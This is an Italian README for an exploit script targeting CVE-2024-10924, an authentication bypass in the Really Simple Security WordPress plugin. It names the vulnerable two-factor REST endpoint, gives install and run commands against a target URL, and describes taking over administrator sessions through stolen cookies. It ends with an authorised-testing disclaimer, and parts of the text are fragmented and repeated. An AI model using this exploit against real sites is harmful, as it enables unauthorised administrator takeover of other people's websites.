
Really Simple Security (Free, Pro e Pro Multisite) 9.0.0 - 9.1.1.1 - Bypass dell'autenticazione
Really Simple Security (Free, Pro e Pro Multisite) 9.0.0 - 9.1.1.1 - Bypass di Autenticazione
Questo script sfrutta una vulnerabilità nel plugin Really Simple Security (versioni 9.0.0 - 9.1.1.1) per WordPress. Il difetto consente il bypass dell'autenticazione a causa di una gestione impropria degli errori nella funzione check_login_and_get_user nell'API di autenticazione a due fattori.
Usando questo exploit, un attaccante può accedere come qualsiasi utente (es. amministratore) se il 2FA è abilitato. Una volta autenticato, lo script avvia automaticamente una sessione del browser con i cookie di sessione ottenuti.
Prima di eseguire lo script, installa le dipendenze richieste:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, concedendo l'accesso come amministratore senza necessità di password.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Questo script è inteso solo per scopi educativi e valutazioni di sicurezza autorizzate. L'uso improprio di questo script può comportare conseguenze legali. Ottieni sempre la debita autorizzazione prima di testare su qualsiasi sistema.